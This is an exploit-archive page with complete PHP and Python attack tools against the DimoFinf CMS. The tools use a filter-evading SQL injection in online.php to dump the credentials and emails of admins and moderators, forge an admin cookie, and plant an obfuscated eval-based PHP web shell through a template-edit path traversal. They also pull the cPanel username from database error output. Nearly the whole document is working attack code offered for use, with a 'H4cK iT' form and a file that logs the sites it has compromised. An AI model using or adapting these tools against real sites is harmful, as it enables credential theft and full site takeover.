facebook facebook twitter rss

DimoFinf ==> Upload via SQLi

Author: UzunDz , Published: 04-02-2014
PHP Expl0!T Code :

#############################################################################
<title> DimoFinf ==> Upload via SQLi.</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1256" />
<h1> DimoFinf ==> Upload via SQLi.</h1>
<form method="POST">
Site : <input type="text" name="url" placeholder="http://localhost/dimofinf/" size=40 /> <input type="submit" name="SQli" value="H4cK iT" />
</form>
<?php

set_time_limit
(0);
error_reporting(0);
/* 
    ####################
    # by Ali , UzunDz
    # UzunDz@gmail.com
    # sec4ever.com
    ####################
    
    # Vuln Code : 

    else if ( $dimofinf->GPC['action'] == "detailstat" )
    {
        $outdata = "<table class=\"tborder\" width=\"100%\">";
        $fintotal = 0;
        $unusr_total = $dimofinf->db->query_read_slave( "SELECT module,COUNT(*) AS total FROM ".TABLE_PREFIX."online WHERE ip='".$_REQUEST[ip]."' GROUP BY module  ORDER BY total DESC" );
        [...]
    }
        ip='".$_REQUEST[ip]."' // inject via post to bypass fllter
        POST_DATA : ip=|sql]
*/

if(isset($_POST['SQli']) && $_POST['url'] != ""){
    
$url $_POST['url'];

    
$cURL2 curl_init();
    
curl_setopt($cURL2,CURLOPT_RETURNTRANSFER,1);
    
curl_setopt($cURL2,CURLOPT_URL,$url);
    
curl_setopt($cURL2,CURLOPT_USERAGENT,'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
    
$cURLex curl_exec($cURL2);

    echo 
"<textarea cols='80' rows='10' >";
    
$url $_POST['url'];
    
$adminfo "ip=dz'/**//*!12345%55NION*//**//*!%53ELECT*//**/1,concat(0x3c783030783e,id,0x3a,username,0x3a,password,0x3a,email,0x3c2f783030783e)/**//*!from*//**//*!profile*//**/%23";
    
$curl curl_init();
    
curl_setopt($curlCURLOPT_URL,"$url/online.php?action=detailstat");
    
curl_setopt($curlCURLOPT_RETURNTRANSFER1);
    
curl_setopt($curlCURLOPT_POST1);
    
curl_setopt($curlCURLOPT_POSTFIELDS,$adminfo);
    
curl_setopt($curlCURLOPT_HEADERfalse);
    
$exec=curl_exec($curl);
    
curl_close($curl);
    
preg_match("#<x00x>(.*?)</x00x>#" ,$exec,$res1);
    
$admres explode(":",$res1[1]);
    echo 
"[+] $url";
    echo 
check($url);
    echo 
cpuser($url);
    echo 
"\n[+] Admin :\nid : $admres[0]\nuser : $admres[1]\npass : $admres[2]\nemail : $admres[3]\n\n";
    
$cook "dimadmlogin=$admres[1]-$admres[2]-1445767838";
    echo 
"cookie : ".$cook;
    for(
$LIMIT=1;$LIMIT<5000;$LIMIT++){
        
$modinfo "ip=dz'/**//*!12345%55NION*//**//*!%53ELECT*//**/1,concat(0x3c783030783e,id,0x3a,username,0x3a,password,0x3a,email,0x3c2f783030783e) from moderators LIMIT ".$LIMIT.",1/**/%23";
        
$ch curl_init();
        
curl_setopt($chCURLOPT_URL"$url/online.php?action=detailstat");
        
curl_setopt($chCURLOPT_POST1);
        
curl_setopt($chCURLOPT_POSTFIELDS,$modinfo);
        
curl_setopt($chCURLOPT_RETURNTRANSFER1);
        
curl_setopt($chCURLOPT_HEADERfalse);
        
$exec=curl_exec($ch);
        
curl_close($ch);
        
preg_match("#<x00x>(.*?)</x00x>#" ,$exec,$res2);
        if(empty(
$res2)){break;}
        
$modres explode(":",$res2[1]);
        echo 
"\n[+] Moderators id=$modres[0] :\nid : $modres[0]\nuser : $modres[1]\npass : $modres[2]\nemail : $modres[3]\n\n";
    }
    echo 
"</textarea><br /><br />";
    
upload($url,$cook);
}
function 
upload($url,$cook){ /* if admin panel not protected with firewall , the function may be upload a shell */
    //$payload = "%3C%3F%0D%0Aecho+%27x00x_BOT%3Cform+action%3D%22%22+method%3D%22POST%22+%3E%0D%0A%3Cinput+type%3D%22text%22+name%3D%22id%22++%3E%0D%0A%3C%2Fform%3E%27%3B%0D%0Aif+%28%40%24_POST%5B%27id%27%5D%29%7B%0D%0A%24s%3D%22str%22.%22iPs%22.%22las%22.%22hes%22%3B%0D%0AeVaL%28%24s%28%24_POST%5B%27id%27%5D%29%29%3B%0D%0A%7D%0D%0A%3F%3E";
    
$x00x curl_init();
    
curl_setopt($x00xCURLOPT_URL$url."/dimcp/style.php?action=edit&stylef=default");
    
curl_setopt($x00xCURLOPT_COOKIE$cook);
    
curl_setopt($x00xCURLOPT_POST1);
    
curl_setopt($x00xCURLOPT_POSTFIELDS,'template=../../x00x_BOT.php&newtext=%3C%3F%0D%0Aecho+%27x00x_BOT%3Cform+action%3D%22%22+method%3D%22POST%22+%3E%0D%0A%3Cinput+type%3D%22text%22+name%3D%22id%22++%3E%0D%0A%3C%2Fform%3E%27%3B%0D%0Aif+%28%40%24_POST%5B%27id%27%5D%29%7B%0D%0A%24s%3D%22str%22.%22iPs%22.%22las%22.%22hes%22%3B%0D%0AeVaL%28%24s%28%24_POST%5B%27id%27%5D%29%29%3B%0D%0A%7D%0D%0A%3F%3E&edit=%CA%CD%D1%ED%D1');
    
curl_setopt($x00x,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0");
    
curl_setopt($x00x,CURLOPT_RETURNTRANSFER,1);
    
$res curl_exec($x00x);
    
//print_r($res);
    
if(eregi("x00x_BOT",@file_get_contents($url."/x00x_BOT.php"))){
    echo 
"[+] <a href='".$url."/x00x_BOT.php'>".$url."/x00x_BOT.php</a> -> Upload Success\n";
    
file_put_contents("dimofinf-up.txt","$url/x00x_BOT.php\n",FILE_APPEND);
    }else {echo 
"[+] $url/ -> Upload Filed\n";}
}
function 
check($url){ /* check the panel if protected or not */

    
if(preg_match('<div class="tcat" align="center">',file_get_contents("$url/dimcp/"))){
        echo 
" -> Admin panel Not Protected\n";
    }else {
        echo 
" -> Admin panel Protected\n";
    }
}
function 
cpuser($url){ /* get cpanel user from local file disclosure vuln */
    
$x preg_match("/Table '(.*?)_/",file_get_contents("$url/search.php?action=startsearch&keyword=uzundz&searchin=albumss&submit="),$cp);
    if(
$x){
    echo 
"Cpanel User -> ".$cp[1];}
}
?>

#############################################################################
PYTHON Expl0!T Code :
#############################################################################

#!C:\python\python.exe
'''
by Ali , UzunDz
UzunDz@gmail.com
Sec4ever.com
'''
import cgi, re, urllib2
form = cgi.FieldStorage()
def empty( variable ):
if not variable:
return True
return False
def sqliup(url):
# SQLi
data = "ip=dz'/**//*!12345%55NION*//**//*!%53ELECT*//**/1,concat(0x3c783030783e,id,0x3a,username,0x3a,password,0x3a,email,0x3c2f783030783e)/**//*!from*//**//*!profile*//**/%23"
path = url + '/online.php?action=detailstat&ip='
req = urllib2.Request(path,data)
sq1 = urllib2.urlopen(req).read()
find = re.findall('<x00x>(.*?)</x00x>',sq1)
if find :
print "<textarea cols='60' rows='10' >\n[+] url : "+url+"\n[+] Admin :\nid : "+find[0].split(':')[0]
print 'username : '+find[0].split(':')[1]
print 'pass : '+find[0].split(':')[2]+"</textarea>"
# upload from here
cook = "dimadmlogin="+find[0].split(':')[1]+"-"+find[0].split(':')[2]+"-1445767838"
xdata = "template=../../x00x_BOT.php&newtext=%3C%3F%0D%0Aecho+%27x00x_BOT%3Cform+action%3D%22%22+method%3D%22POST%22+%3E%0D%0A%3Cinput+type%3D%22text%22+name%3D%22id%22++%3E%0D%0A%3C%2Fform%3E%27%3B%0D%0Aif+%28%40%24_POST%5B%27id%27%5D%29%7B%0D%0A%24s%3D%22str%22.%22iPs%22.%22las%22.%22hes%22%3B%0D%0AeVaL%28%24s%28%24_POST%5B%27id%27%5D%29%29%3B%0D%0A%7D%0D%0A%3F%3E&edit=%CA%CD%D1%ED%D1"
xpath = url+'/dimcp/style.php?action=edit&stylef=default'
xreq = urllib2.Request(xpath,xdata)
xreq.add_header("Cookie", cook)
up = urllib2.urlopen(xreq).read()
if up :
try :
check = urllib2.urlopen(url+'/x00x_BOT.php')
if check :
print 'Upload Success : <a href="%s/x00x_BOT.php">%s/x00x_BOT.php</a>'%(url,url)
else :
print 'Upload failed.'
except Exception ,e :
print e
site = form.getvalue('url')
print """Content-type: text/html

<meta http-equiv="Content-Type" content="text/html; charset=windows-1256" />
<title>DimoFinf ==> Upload via SQLi.</title>
<h1>DimoFinf ==> Upload via SQLi.</h1>
<form method="POST">
Site : <input type="text" name="url" placeholder="http://localhost/dimofinf/" size=40 /> <input type="submit" name="SQli" value="H4cK iT" />
</form>
"""
if not empty(site) :
sqliup(site)

#############################################################################

Like us on Facebook :